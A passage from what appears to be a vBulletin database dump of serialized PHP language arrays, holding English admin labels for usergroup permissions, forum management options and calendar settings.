\";s:24:\"album_picture_max_height\";s:37:\"Album Picture Maximum Height (pixels)\";s:22:\"album_picture_max_size\";s:68:\"Album Picture Maximum File Size (bytes)\r\n1KB = 1024 bytes \";s:23:\"album_picture_max_width\";s:36:\"Album Picture Maximum Width (pixels)\";s:18:\"allow_bbcode_align\";s:77:\"Allow Alignment BB Code \";s:18:\"allow_bbcode_basic\";s:52:\"Allow Basic BB Code \";s:17:\"allow_bbcode_code\";s:46:\"Allow Code BB Code \";s:18:\"allow_bbcode_color\";s:48:\"Allow Color BB Code \";s:19:\"allow_bbcode_custom\";s:73:\"Allow Custom BB Codes \";s:17:\"allow_bbcode_font\";s:46:\"Allow Font BB Code \";s:17:\"allow_bbcode_html\";s:46:\"Allow HTML BB Code \";s:16:\"allow_bbcode_img\";s:46:\"Allow Image BB Code \";s:17:\"allow_bbcode_link\";s:69:\"Allow Link BB Code \";s:17:\"allow_bbcode_list\";s:46:\"Allow List BB Code \";s:16:\"allow_bbcode_php\";s:44:\"Allow PHP BB Code \";s:18:\"allow_bbcode_quote\";s:48:\"Allow Quote BB Code \";s:17:\"allow_bbcode_size\";s:46:\"Allow Size BB Code \";s:19:\"allow_member_groups\";s:157:\"Allow Users to have Member Groups (Sets whether or not permissions from the user\'s member (secondary) user group memberships are inherited or not) \";s:26:\"apply_permissions_to_forum\";s:59:\"Apply Permissions to Forum (Includes Sub-Forums) \";s:30:\"apply_permissions_to_usergroup\";s:31:\"Apply Permissions to Usergroups\";s:22:\"attachment_permissions\";s:22:\"Attachment Permissions\";s:18:\"birthdays_viewable\";s:139:\"Birthdays Viewable (Sets whether or not the birthdays of users in this group are displayed on the calendar and forum home pages) \";s:20:\"calendar_permissions\";s:20:\"Calendar Permissions\";s:28:\"calendar_permissions_manager\";s:28:\"Calendar Permissions Manager\";s:24:\"can_access_control_panel\";s:43:\"Can Access Control Panel (is Administrator)\";s:22:\"can_administer_bbcodes\";s:23:\"Can Administer BB Codes\";s:24:\"can_administer_calendars\";s:24:\"Can Administer Calendars\";s:19:\"can_administer_cron\";s:19:\"Can Administer CRON\";s:18:\"can_administer_faq\";s:19:\"Can Administer FAQs\";s:21:\"can_administer_forums\";s:21:\"Can Administer Forums\";s:21:\"can_administer_images\";s:40:\"Can Administer Avatars / Icons / Smilies\";s:24:\"can_administer_languages\";s:24:\"Can Administer Languages\";s:28:\"can_administer_moderator_log\";s:28:\"Can Administer Moderator Log\";s:22:\"can_administer_notices\";s:22:\"Can Administer Notices\";s:22:\"can_administer_plugins\";s:22:\"Can Administer Plugins\";s:23:\"can_administer_settings\";s:23:\"Can Administer Settings\";s:21:\"can_administer_styles\";s:21:\"Can Administer Styles\";s:22:\"can_administer_threads\";s:22:\"Can Administer Threads\";s:31:\"can_administer_user_permissions\";s:31:\"Can Administer User Permissions\";s:20:\"can_administer_users\";s:20:\"Can Administer Users\";s:28:\"can_always_create_discussion\";s:120:\"Can Always Create Discussions\r\nIf enabled, the user will also be able to view private and invite only groups. \";s:23:\"can_always_post_message\";s:115:\"Can Always Post Messages\r\nIf enabled, the user will also be able to view private and invite only groups. \";s:13:\"can_ban_users\";s:13:\"Can Ban Users\";s:20:\"can_comment_pictures\";s:23:\"Can Comment on Pictures\";s:21:\"can_create_discussion\";s:36:\"Can Create New Discussions in Groups\";s:24:\"can_create_social_groups\";s:24:\"Can Create Social Groups\";s:15:\"can_create_tags\";s:15:\"Can Create Tags\";s:22:\"can_delete_discussions\";s:22:\"Can Delete Discussions\";s:17:\"can_delete_events\";s:17:\"Can Delete Events\";s:21:\"can_delete_own_events\";s:21:\"Can Delete Own Events\";s:31:\"can_delete_own_picture_comments\";s:31:\"Can Delete Own Picture Comments\";s:20:\"can_delete_own_posts\";s:20:\"Can Delete Own Posts\";s:28:\"can_delete_own_social_groups\";s:28:\"Can Delete Own Social Groups\";s:22:\"can_delete_own_threads\";s:22:\"Can Delete Own Threads\";s:31:\"can_delete_own_visitor_messages\";s:31:\"Can Delete Own Visitor Messages\";s:27:\"can_delete_picture_comments\";s:27:\"Can Delete Picture Comments\";s:16:\"can_delete_posts\";s:16:\"Can Delete Posts\";s:24:\"can_delete_social_groups\";s:24:\"Can Delete Social Groups\";s:27:\"can_delete_tags_own_threads\";s:30:\"Can Delete Tags on Own Threads\";s:19:\"can_deny_pm_receipt\";s:45:\"Can Deny Private Message Read Receipt Request\";s:24:\"can_download_attachments\";s:24:\"Can Download Attachments\";s:25:\"can_edit_background_image\";s:85:\"Can Edit Background Images\r\nUsers must have user album permissions as well \";s:16:\"can_edit_borders\";s:66:\"Can Edit Borders\r\nCovers border style, color, and width \";s:15:\"can_edit_colors\";s:61:\"Can Edit Colors\r\nCovers font and background colors \";s:20:\"can_edit_discussions\";s:20:\"Can Edit Discussions\";s:15:\"can_edit_events\";s:15:\"Can Edit Events\";s:20:\"can_edit_font_family\";s:20:\"Can Edit Font Family\";s:18:\"can_edit_font_size\";s:18:\"Can Edit Font Size\";s:19:\"can_edit_own_events\";s:19:\"Can Edit Own Events\";s:29:\"can_edit_own_picture_comments\";s:29:\"Can Edit Own Picture Comments\";s:18:\"can_edit_own_posts\";s:18:\"Can Edit Own Posts\";s:20:\"can_edit_own_profile\";s:20:\"Can Edit Own Profile\";s:26:\"can_edit_own_social_groups\";s:157:\"Can Edit Own Social Groups\r\nIf the only member of the group is the owner, he/she will be able to edit the group\'s info regardless of this setting. \";s:23:\"can_edit_own_user_notes\";s:156:\"Can Manage Own User NotesNotes that this user has posted, for self or others. This will override the above manage permissions, if enabled. \";s:29:\"can_edit_own_visitor_messages\";s:29:\"Can Edit Own Visitor Messages\";s:25:\"can_edit_picture_comments\";s:25:\"Can Edit Picture Comments\";s:14:\"can_edit_polls\";s:14:\"Can Edit Polls\";s:14:\"can_edit_posts\";s:14:\"Can Edit Posts\";s:16:\"can_edit_privacy\";s:106:\"Can Edit Profile PrivacyWhether the user can hide blocks on their profile page from other users \";s:22:\"can_edit_social_groups\";s:22:\"Can Edit Social Groups\";s:16:\"can_edit_threads\";s:16:\"Can Edit Threads\";s:21:\"can_edit_user_avatars\";s:21:\"Can Edit User Avatars\";s:30:\"can_edit_user_profile_pictures\";s:30:\"Can Edit User Profile Pictures\";s:33:\"can_edit_user_reputation_comments\";s:33:\"Can Edit User Reputation Comments\";s:24:\"can_edit_user_signatures\";s:24:\"Can Edit User Signatures\";s:17:\"can_email_members\";s:17:\"Can Email Members\";s:30:\"can_give_arbitrary_infractions\";s:36:\"Can Give Arbitrary Value Infractions\";s:20:\"can_give_infractions\";s:30:\"Can Give Infractions to Others\";s:14:\"can_have_album\";s:34:\"Can Have Album and Upload Pictures\";s:19:\"can_hide_reputation\";s:31:\"Can Hide Reputation from Others\";s:16:\"can_ignore_quota\";s:70:\"Can send PMs to users who have reached their quota and/or disabled PMs\";s:22:\"can_join_social_groups\";s:22:\"Can Join Social Groups\";s:29:\"can_leave_negative_reputation\";s:29:\"Can Leave Negative Reputation\";s:20:\"can_limit_discussion\";s:165:\"Can Limit Discussions in Own Groups to the Group OwnerIf enabled, the user can configure their social groups so that only they can create new discussions. \";s:32:\"can_manage_comments_own_pictures\";s:35:\"Can Manage Comments on Own Pictures\";s:28:\"can_manage_group_discussions\";s:26:\"Can Manage Own Discussions\";s:25:\"can_manage_group_messages\";s:23:\"Can Manage Own Messages\";s:28:\"can_manage_others_user_notes\";s:34:\"Can Manage User Notes About Others\";s:28:\"can_manage_own_social_groups\";s:28:\"Can Manage Own Social Groups\";s:25:\"can_manage_own_user_notes\";s:32:\"Can Manage User Notes About Self\";s:31:\"can_manage_own_visitor_messages\";s:38:\"Can Manage Messages within Own Profile\";s:18:\"can_manage_threads\";s:18:\"Can Manage Threads\";s:21:\"can_mass_move_threads\";s:21:\"Can Mass-Move Threads\";s:22:\"can_mass_prune_threads\";s:22:\"Can Mass-Prune Threads\";s:24:\"can_moderate_attachments\";s:24:\"Can Moderate Attachments\";s:24:\"can_moderate_discussions\";s:24:\"Can Moderate Discussions\";s:19:\"can_moderate_events\";s:19:\"Can Moderate Events\";s:29:\"can_moderate_picture_comments\";s:29:\"Can Moderate Picture Comments\";s:21:\"can_moderate_pictures\";s:21:\"Can Moderate Pictures\";s:18:\"can_moderate_posts\";s:18:\"Can Moderate Posts\";s:15:\"can_move_events\";s:15:\"Can Move Events\";s:20:\"can_move_own_threads\";s:20:\"Can Move Own Threads\";s:26:\"can_open_close_own_threads\";s:28:\"Can Open / Close Own Threads\";s:22:\"can_open_close_threads\";s:24:\"Can Open / Close Threads\";s:32:\"can_override_primary_group_title\";s:39:\"Can override primary group title/markup\";s:33:\"can_physically_delete_discussions\";s:120:\"Can Physically Delete Discussions (Completely removes the discussion and all of it\'s posts from the database) \";s:27:\"can_physically_delete_posts\";s:86:\"Can Physically Delete Posts (Completely removes the post from the database) \";s:22:\"can_post_announcements\";s:129:\"Can Post Announcements\r\nGranting this permission will allow this user to post announcements containing arbitrary HTML. \";s:20:\"can_post_attachments\";s:20:\"Can Post Attachments\";s:15:\"can_post_events\";s:15:\"Can Post Events\";s:22:\"can_post_group_message\";s:27:\"Can Post Messages in Groups\";s:14:\"can_post_polls\";s:14:\"Can Post Polls\";s:16:\"can_post_threads\";s:16:\"Can Post Threads\";s:32:\"can_post_user_notes_about_others\";s:32:\"Can Post User Notes About Others\";s:30:\"can_post_user_notes_about_self\";s:30:\"Can Post User Notes About Self\";s:43:\"can_post_visitor_messages_to_others_profile\";s:44:\"Can Post Visitor Messages to Others\' Profile\";s:40:\"can_post_visitor_messages_to_own_profile\";s:40:\"Can Post Visitor Messages to Own Profile\";s:16:\"can_rate_threads\";s:16:\"Can Rate Threads\";s:27:\"can_remove_picture_comments\";s:101:\"Can Physically Delete Picture Comments\r\n(Completely removes the comment from the database) \";s:27:\"can_reply_to_others_threads\";s:28:\"Can Reply to Others\' Threads\";s:24:\"can_reply_to_own_threads\";s:24:\"Can Reply to Own Threads\";s:24:\"can_restore_banned_users\";s:24:\"Can Restore Banned Users\";s:23:\"can_reverse_infractions\";s:23:\"Can Reverse Infractions\";s:19:\"can_run_maintenance\";s:25:\"Can Run Maintenance Tools\";s:16:\"can_search_forum\";s:16:\"Can Search Forum\";s:17:\"can_search_forums\";s:17:\"Can Search Forums\";s:24:\"can_see_deletion_notices\";s:24:\"Can See Deletion Notices\";s:23:\"can_see_invisible_users\";s:60:\"Can \'See\' Users Who Have Chosen to be Invisible While Online\";s:31:\"can_see_others_infraction_level\";s:32:\"Can See Others\' Infraction Level\";s:27:\"can_see_rep_left_for_others\";s:34:\"Can See Reputation Left for Others\";s:18:\"can_see_thumbnails\";s:18:\"Can See Thumbnails\";s:29:\"can_see_who_left_user_ratings\";s:29:\"Can See Who Left User Ratings\";s:22:\"can_set_forum_password\";s:22:\"Can Set Forum Password\";s:22:\"can_set_self_invisible\";s:30:\"Can Set Self to Invisible Mode\";s:22:\"can_tag_others_threads\";s:23:\"Can Tag Others\' Threads\";s:19:\"can_tag_own_threads\";s:19:\"Can Tag Own Threads\";s:26:\"can_transfer_social_groups\";s:26:\"Can Transfer Social Groups\";s:26:\"can_upload_ani_gif_sig_img\";s:37:\"Can Upload Animated GIF for Signature\";s:26:\"can_upload_animated_avatar\";s:26:\"Can Upload Animated Avatar\";s:30:\"can_upload_animated_group_icon\";s:31:\"Can Upload Animated Group Icons\";s:35:\"can_upload_animated_profile_picture\";s:35:\"Can Upload Animated Profile Picture\";s:22:\"can_upload_attachments\";s:22:\"Can Upload Attachments\";s:25:\"can_upload_custom_avatars\";s:25:\"Can Upload Custom Avatars\";s:27:\"can_upload_profile_pictures\";s:27:\"Can Upload Profile Pictures\";s:18:\"can_upload_sig_img\";s:31:\"Can Upload Images for Signature\";s:28:\"can_upload_social_group_icon\";s:29:\"Can Upload Social Group Icons\";s:22:\"can_use_boolean_search\";s:80:\"Can Use Boolean Search(Only applies if Fulltext searching is enabled) \";s:20:\"can_use_custom_title\";s:20:\"Can Use Custom Title\";s:23:\"can_use_email_to_friend\";s:23:\"Can Use Email to Friend\";s:15:\"can_use_friends\";s:20:\"Can Use Friends List\";s:24:\"can_use_message_tracking\";s:24:\"Can Use Message Tracking\";s:18:\"can_use_reputation\";s:18:\"Can Use Reputation\";s:18:\"can_use_signatures\";s:18:\"Can Use Signatures\";s:15:\"can_view_albums\";s:147:\"Can View Albums\r\nUsers without this permission will still be able to see picture in public and profile album if they know the exact URL. \";s:20:\"can_view_attachments\";s:20:\"Can View Attachments\";s:17:\"can_view_calendar\";s:17:\"Can View Calendar\";s:14:\"can_view_forum\";s:14:\"Can View Forum\";s:29:\"can_view_hidden_custom_fields\";s:30:\"Can View Private Custom Fields\";s:21:\"can_view_ip_addresses\";s:21:\"Can View IP Addresses\";s:20:\"can_view_member_info\";s:20:\"Can View Member Info\";s:22:\"can_view_others_events\";s:23:\"Can View Others\' Events\";s:32:\"can_view_others_profile_pictures\";s:33:\"Can View Others\' Profile Pictures\";s:23:\"can_view_others_threads\";s:24:\"Can View Others\' Threads\";s:26:\"can_view_others_user_notes\";s:32:\"Can View User Notes About Others\";s:23:\"can_view_own_user_notes\";s:30:\"Can View User Notes About Self\";s:22:\"can_view_social_groups\";s:22:\"Can View Social Groups\";s:16:\"can_view_threads\";s:23:\"Can View Thread Content\";s:22:\"can_view_whole_profile\";s:42:\"Can View Whole User Profile (but not edit)\";s:20:\"can_view_whos_online\";s:21:\"Can View Who\'s Online\";s:28:\"can_view_wol_actual_location\";s:48:\"Can view actual location of user (filepath/url).\";s:25:\"can_view_wol_bad_location\";s:80:\"Can View Detailed Location Info of Users Who Visit Bad / No Permission Locations\";s:28:\"can_view_wol_detail_location\";s:41:\"Can View Detailed Location Info for Users\";s:17:\"can_vote_on_polls\";s:17:\"Can Vote on Polls\";s:26:\"control_panel_style_choice\";s:26:\"Control Panel Style Choice\";s:27:\"copy_permissions_from_forum\";s:75:\"Copy Permissions from Forum (Does not include sub-forums) \";s:27:\"copy_permissions_from_group\";s:32:\"Copy Permissions from User Group\";s:26:\"copy_permissions_to_forums\";s:26:\"Copy Permissions to Forums\";s:26:\"copy_permissions_to_groups\";s:31:\"Copy Permissions to User Groups\";s:26:\"custom_avatar_max_filesize\";s:66:\"Custom Avatar Maximum File Size (bytes)1KB = 1024 bytes \";s:24:\"custom_avatar_max_height\";s:37:\"Custom Avatar Maximum Height (pixels)\";s:23:\"custom_avatar_max_width\";s:36:\"Custom Avatar Maximum Width (pixels)\";s:27:\"custom_calendar_permissions\";s:27:\"Custom Calendar Permissions\";s:54:\"customized_using_custom_permissions_for_this_usergroup\";s:62:\"Customized: Using custom permissions for this usergroup\";s:25:\"default_forum_permissions\";s:25:\"Default Forum Permissions\";s:27:\"delete_selected_permissions\";s:27:\"Delete Selected Permissions\";s:8:\"deny_all\";s:8:\"Deny All\";s:23:\"dismissed_news_item_ids\";s:33:\"Dismissed vBulletin News Item IDs\";s:22:\"edit_forum_permissions\";s:22:\"Edit Forum Permissions\";s:49:\"edit_forum_permissions_for_usergroup_x_in_forum_y\";s:70:\"Edit Forum Permissions For Usergroup: %1$s in Forum %2$s\";s:22:\"events_are_unmoderated\";s:31:\"Posted Events are Not Moderated\";s:29:\"follow_forum_moderation_rules\";s:92:\"Follow Forum Moderation RulesIf no, posts are always placed into moderation queue \";s:37:\"follow_group_message_moderation_rules\";s:110:\"Follow Social Group Message Moderation RulesIf no, messages are always placed into moderation queue \";s:39:\"follow_picture_comment_moderation_rules\";s:39:\"Follow Picture Comment Moderation Rules\";s:31:\"follow_picture_moderation_rules\";s:31:\"Follow Picture Moderation Rules\";s:39:\"follow_visitor_message_moderation_rules\";s:105:\"Follow Visitor Message Moderation RulesIf no, messages are always placed into moderation queue \";s:33:\"forum_based_permission_duplicator\";s:33:\"Forum-Based Permission Duplicator\";s:17:\"forum_permissions\";s:17:\"Forum Permissions\";s:25:\"forum_permissions_manager\";s:25:\"Forum Permissions Manager\";s:27:\"forum_searching_permissions\";s:27:\"Forum Searching Permissions\";s:25:\"forum_viewing_permissions\";s:25:\"Forum Viewing Permissions\";s:19:\"general_permissions\";s:19:\"General Permissions\";s:32:\"give_admin_access_arbitrary_html\";s:164:\"Giving a user administrative access will allow him or her to create announcements which may contain arbitrary HTML. Only grant this access if you trust this person.\";s:64:\"inherited_using_custom_permissions_inherited_from_a_parent_forum\";s:72:\"Inherited: Using custom permissions inherited from a parent forum\";s:15:\"is_banned_group\";s:269:\"This Usergroup is not a \'Banned\' Group (Setting this to no will cause the group to be treated as a banned group, this will prevent the sending of email notifications, show a banned error message on the permission error pages and other unspecified behaviors.) \";s:18:\"is_super_moderator\";s:44:\"Can Moderate All Forums (is Super Moderator)\";s:36:\"making_x_a_member_of_the_usergroup_y\";s:43:\"Making %1$s a member of the usergroup %2$s.\";s:22:\"maximum_created_groups\";s:88:\"Maximum Created GroupsThe amount of groups the user can have at any one time. \";s:30:\"maximum_recipients_to_send_pms\";s:141:\"Maximum Recipients to Send PMs at a time:Do not set this too high for performance reasons (set to 0 to allow unlimited recipients) \";s:23:\"maximum_stored_messages\";s:124:\"Maximum Stored Messages:If you set this to 0 users from this usergroup will not be able to use private messaging. \";s:25:\"message_throttle_quantity\";s:121:\"Message Throttle QuantityThis limits the amount of messages the user can send within the Throttle Check Period \";s:30:\"must_enable_custom_permissions\";s:91:\"For this setting to have any effect, custom permissions for this usergroup must be enabled.\";s:34:\"note_groups_marked_with_a_asterisk\";s:153:\"Note : Groups marked with an * can be selected by their members to override the username markup and user title from their primary usergroup.\";s:32:\"only_copy_permissions_from_forum\";s:65:\"Only Copy Permissions from Forum (Includes sub-forums) \";s:32:\"only_copy_permissions_from_group\";s:37:\"Only Copy Permissions from User Group\";s:14:\"order_by_forum\";s:14:\"Order By Forum\";s:18:\"order_by_usergroup\";s:18:\"Order By Usergroup\";s:25:\"other_users_can_be_posted\";s:41:\"User Notes Can Be Posted About This Group\";s:27:\"overwrite_duplicate_entries\";s:27:\"Overwrite Duplicate Entries\";s:27:\"overwrite_inherited_entries\";s:27:\"Overwrite Inherited Entries\";s:15:\"password_expiry\";s:171:\"Password Expiry (If you specify a number of days here, users will be required to change their password when this amount of time elapsed since they last changed) \";s:16:\"password_history\";s:243:\"Password History (If you specify a number of days here, users will not be allowed to change their password to a value that they have used in the past x days. Note: this setting has no effect if password expiry is set to 0 days) \";s:28:\"permission_duplication_tools\";s:28:\"Permission Duplication Tools\";s:27:\"permission_overwrite_notice\";s:106:\"Note: These permissions will overwrite any existing permissions for this forum for the selected usergroups\";s:11:\"permissions\";s:11:\"Permissions\";s:24:\"permissions_quick_editor\";s:24:\"Permissions Quick Editor\";s:29:\"picture_uploading_permissions\";s:29:\"Picture Uploading Permissions\";s:16:\"poll_permissions\";s:16:\"Poll Permissions\";s:16:\"post_permissions\";s:16:\"Post Permissions\";s:23:\"post_thread_permissions\";s:25:\"Post / Thread Permissions\";s:27:\"private_message_permissions\";s:27:\"Private Message Permissions\";s:28:\"profile_picture_max_filesize\";s:68:\"Profile Picture Maximum File Size (bytes)1KB = 1024 bytes \";s:26:\"profile_picture_max_height\";s:39:\"Profile Picture Maximum Height (pixels)\";s:25:\"profile_picture_max_width\";s:38:\"Profile Picture Maximum Width (pixels)\";s:28:\"quick_forum_permission_setup\";s:28:\"Quick Forum Permission Setup\";s:16:\"require_hv_check\";s:209:\"Require Human Verification on Configured Actions\r\nUsers will have to pass human verification for the configured Human Verified Actions .\";s:38:\"show_edited_by_note_on_edited_messages\";s:46:\"Show edited by note on edited messages?\";s:22:\"sig_image_max_filesize\";s:40:\"Signature Image Maximum Filesize (bytes)\";s:20:\"sig_image_max_height\";s:39:\"Signature Image Maximum Height (pixels)\";s:19:\"sig_image_max_width\";s:38:\"Signature Image Maximum Width (pixels)\";s:13:\"sig_max_chars\";s:73:\"Maximum Characters in Signature Excluding BB Code Markup\";s:14:\"sig_max_images\";s:37:\"Maximum Number of Images in Signature\";s:13:\"sig_max_lines\";s:26:\"Maximum Lines in Signature\";s:17:\"sig_max_raw_chars\";s:73:\"Maximum Characters in Signature Including BB Code Markup\";s:19:\"sig_max_size_bbcode\";s:39:\"Maximum Value of x for [SIZE=x] BB Code\";s:21:\"signature_permissions\";s:21:\"Signature Permissions\";s:26:\"social_group_icon_max_size\";s:146:\"Maximum File Size of Social Group Icons (bytes) \r\nNote: Social Group Image Icons are always limited to 200px by 200px. \";s:24:\"social_group_permissions\";s:25:\"Social Groups Permissions\";s:26:\"space_in_bytes_attachlimit\";s:107:\"Space (in bytes) that a user\'s total attachment usage may consume (Set to 0 to not have a limit) \";s:22:\"use_custom_permissions\";s:22:\"Use Custom Permissions\";s:23:\"use_default_permissions\";s:94:\"Use Usergroup Default Permissions (Note: this will delete any previous custom permissions set)\";s:22:\"user_album_permissions\";s:22:\"User Album Permissions\";s:29:\"user_infraction_banning_level\";s:29:\"User Infraction Banning Level\";s:27:\"user_infraction_permissions\";s:27:\"User Infraction Permissions\";s:21:\"user_note_permissions\";s:21:\"User Note Permissions\";s:16:\"user_permissions\";s:16:\"User Permissions\";s:27:\"user_reputation_permissions\";s:27:\"User Reputation Permissions\";s:19:\"usercss_permissions\";s:33:\"Profile Customization Permissions\";s:37:\"usergroup_based_permission_duplicator\";s:38:\"User Group-Based Permission Duplicator\";s:20:\"usergroup_user_title\";s:124:\"User Title (Use this to override the default \'ladder\' of user titles ) \";s:15:\"username_markup\";s:266:\"Username HTML Markup (Specify an opening and closing HTML tag with which to display the names of users in this group. This applies to names that appear on Logged-in Users, Who\'s Online, Users Browsing Forum, Users Browsing Thread, Posts, Member List etc.) \";s:22:\"view_control_panel_log\";s:22:\"View Control Panel Log\";s:22:\"view_forum_permissions\";s:22:\"View Forum Permissions\";s:16:\"view_permissions\";s:16:\"View Permissions\";s:22:\"viewable_on_memberlist\";s:110:\"Viewable on the Memberlist (Sets whether or not users in this group will appear on the member list) \";s:22:\"viewable_on_showgroups\";s:167:\"Viewable on Show Groups (Sets whether or not to show members of this group on the \'View Forum Leaders \' page) \";s:27:\"visitor_message_permissions\";s:27:\"Visitor Message Permissions\";s:23:\"whos_online_permissions\";s:24:\"Who\'s Online Permissions\";s:18:\"x_access_masks_set\";s:23:\"%1$s Access Mask(s) set\";s:40:\"x_is_already_a_member_of_the_usergroup_y\";s:54:\"%1$s is already a member of the usergroup %2$s.\";}', 'a:71:{s:14:\"access_options\";s:14:\"Access Options\";s:12:\"act_as_forum\";s:52:\"Act as Forum (Will act as category if no) \";s:16:\"add_announcement\";s:16:\"Add Announcement\";s:15:\"add_child_forum\";s:15:\"Add Child Forum\";s:13:\"add_moderator\";s:13:\"Add Moderator\";s:13:\"add_new_forum\";s:13:\"Add New Forum\";s:11:\"allow_icons\";s:16:\"Allow Post Icons\";s:34:\"allow_thread_ratings_in_this_forum\";s:34:\"Allow Thread Ratings in this Forum\";s:26:\"apply_password_to_children\";s:64:\"Apply This Password to Child Forums (Only if changed) \";s:35:\"are_you_sure_want_to_delete_forum_x\";s:159:\"Are you sure you want to delete the forum called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:42:\"are_you_sure_you_want_to_delete_this_forum\";s:90:\"Are you sure you want to delete this forum? Note that any sub-forums will also be deleted!\";s:17:\"can_have_password\";s:178:\"Can Have Password (Setting this to no will prevent a password from being inherited and from being set by moderators) (Note: You may still set a password manually) \";s:8:\"category\";s:8:\"Category\";s:20:\"count_posts_in_forum\";s:55:\"Count Posts Made in this Forum Towards User Post Counts\";s:31:\"create_forum_based_off_of_forum\";s:32:\"Create Forum Based off of Forum:\";s:18:\"custom_forum_style\";s:27:\"Custom Style for this Forum\";s:18:\"default_sort_field\";s:18:\"Default Sort Field\";s:18:\"default_sort_order\";s:18:\"Default Sort Order\";s:12:\"delete_forum\";s:12:\"Delete Forum\";s:23:\"do_not_change_usergroup\";s:23:\"DO NOT CHANGE USERGROUP\";s:18:\"edit_display_order\";s:18:\"Edit Display Order\";s:10:\"edit_forum\";s:10:\"Edit Forum\";s:13:\"edit_password\";s:13:\"Edit Password\";s:26:\"emails_to_notify_when_post\";s:98:\"Email Addresses to Notify When there is a New Post (Separate each address with a SPACE) \";s:28:\"emails_to_notify_when_thread\";s:100:\"Email Addresses to Notify When there is a New Thread (Separate each address with a SPACE) \";s:12:\"empty_forums\";s:12:\"Empty Forums\";s:6:\"expand\";s:6:\"Expand\";s:8:\"explicit\";s:8:\"Explicit\";s:15:\"forum_is_active\";s:109:\"Forum is Active (Will not appear if set to no, but remains accessible if the forum\'s URL is known) \";s:10:\"forum_link\";s:114:\"Forum Link (Entering a URL here will cause anyone clicking the forum link to be redirected to that URL) \";s:13:\"forum_manager\";s:13:\"Forum Manager\";s:10:\"forum_open\";s:100:\"Forum is Open (Set this to \'No\' to prevent any new posts being made in this forum) \";s:14:\"forum_password\";s:103:\"Forum Password (Optional: This acts in addition to any other permissions set for this forum) \";s:45:\"forums_marked_asterisk_are_password_protected\";s:45:\"Forums Marked * are Password-Protected\";s:9:\"image_url\";s:57:\"Image URLMinimum 300x300. Must be .jpg or .png \";s:15:\"index_new_posts\";s:126:\"Index New Posts in Search Engine (Setting this to \'No\' will prevent anyone from being able to search in this forum) \";s:8:\"keywords\";s:39:\"KeywordsSeparate with commas \";s:4:\"link\";s:4:\"Link\";s:15:\"list_moderators\";s:15:\"List Moderators\";s:12:\"media_author\";s:12:\"Media Author\";s:20:\"moderate_attachments\";s:20:\"Moderate Attachments\";s:14:\"moderate_posts\";s:14:\"Moderate Posts\";s:16:\"moderate_threads\";s:16:\"Moderate Threads\";s:18:\"moderation_options\";s:18:\"Moderation Options\";s:21:\"override_style_choice\";s:181:\"Override Users\' Style Choice (If this forum uses a custom style, this will force users with a different style choice to see the forum with the style you specified) \";s:11:\"owner_email\";s:11:\"Owner Email\";s:10:\"owner_name\";s:10:\"Owner Name\";s:3:\"pda\";s:3:\"PDA\";s:19:\"please_select_forum\";s:21:\"Please select a forum\";s:16:\"podcast_settings\";s:16:\"Podcast Settings\";s:15:\"posting_options\";s:15:\"Posting Options\";s:30:\"prefix_for_forum_status_images\";s:161:\"Prefix for Forum Status Images\r\n(This prefix will be used on status image filenames for a forum, it can only contain A-Z, 0-9, -, _, . and / ) \";s:65:\"require_moderator_validation_before_new_attachments_are_displayed\";s:65:\"Require moderator validation before new attachments are displayed\";s:59:\"require_moderator_validation_before_new_posts_are_displayed\";s:59:\"Require moderator validation before new posts are displayed\";s:61:\"require_moderator_validation_before_new_threads_are_displayed\";s:61:\"Require moderator validation before new threads are displayed\";s:27:\"require_threads_have_prefix\";s:32:\"Require Threads to have a Prefix\";s:16:\"show_all_threads\";s:16:\"Show all threads\";s:24:\"show_forum_on_forum_jump\";s:55:\"Show this Forum and Child Forums on the Forum Jump Menu\";s:18:\"show_private_forum\";s:408:\"Show Private Forum(Select \'No\' here to hide this forum from users who are not allowed to access it. Users who do have permission to access it will have to log in before they can see this forum. This option applies to any forum listing, including the Forum Jump menu, and Search Results. Selecting \'Use default\' will use the system default as defined in Forum Listings Display Options.) \";s:13:\"style_options\";s:13:\"Style Options\";s:8:\"subtitle\";s:8:\"Subtitle\";s:7:\"summary\";s:7:\"Summary\";s:11:\"use_default\";s:11:\"Use Default\";s:17:\"use_default_style\";s:17:\"Use Default Style\";s:24:\"use_selected_prefix_sets\";s:24:\"Use Selected Prefix Sets\";s:10:\"view_forum\";s:10:\"View Forum\";s:17:\"view_full_version\";s:17:\"View Full Version\";s:16:\"view_permissions\";s:16:\"View Permissions\";s:9:\"x_replies\";s:12:\"%1$s replies\";s:23:\"yes_display_post_counts\";s:25:\"Yes - Display Post Counts\";s:20:\"yes_hide_post_counts\";s:22:\"Yes - Hide Post Counts\";}', 'a:133:{s:16:\"add_new_calendar\";s:16:\"Add New Calendar\";s:20:\"add_new_custom_field\";s:20:\"Add New Custom Field\";s:13:\"add_new_event\";s:13:\"Add New Event\";s:15:\"add_new_holiday\";s:15:\"Add New Holiday\";s:31:\"add_new_moderator_to_calendar_x\";s:62:\"Add New Moderator to Calendar %1$s \";s:12:\"add_reminder\";s:12:\"Add Reminder\";s:7:\"all_day\";s:7:\"All Day\";s:57:\"allow_user_to_input_their_own_value_for_this_custom_field\";s:57:\"Allow user to input their own value for this Custom Field\";s:48:\"are_you_sure_want_to_delete_calendar_moderator_x\";s:172:\"Are you sure you want to delete the calendar moderator called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:38:\"are_you_sure_want_to_delete_calendar_x\";s:162:\"Are you sure you want to delete the calendar called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:51:\"are_you_sure_want_to_delete_custom_calendar_field_x\";s:175:\"Are you sure you want to delete the custom calendar field called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:52:\"are_you_sure_you_want_to_delete_the_holiday_called_x\";s:160:\"Are you sure you want to delete the holiday called \'%1$s\'?(holidayid: %2$s) This action cannot be undone.\";s:36:\"birthday_count_max_birthdays_per_day\";s:179:\"Birthday Count (Sets the maximum number of birthdays to be listed on a single day in the monthly view before a single link to all that day\'s Birthdays is shown instead) \";s:13:\"calendar_jump\";s:13:\"Calendar Jump\";s:16:\"calendar_manager\";s:16:\"Calendar Manager\";s:13:\"calendar_mode\";s:13:\"Calendar Mode\";s:20:\"calendar_permissions\";s:20:\"Calendar Permissions\";s:11:\"choose_time\";s:11:\"Choose Time\";s:29:\"confirm_deletion_of_holiday_x\";s:61:\"Confirm Deletion of Holiday: %1$s \";s:12:\"custom_field\";s:12:\"Custom Field\";s:10:\"date_first\";s:5:\"First\";s:9:\"date_last\";s:4:\"Last\";s:14:\"date_range_dfn\";s:175:\"Date Range Beginning and ending years in the format of: Example: %1$s Start year 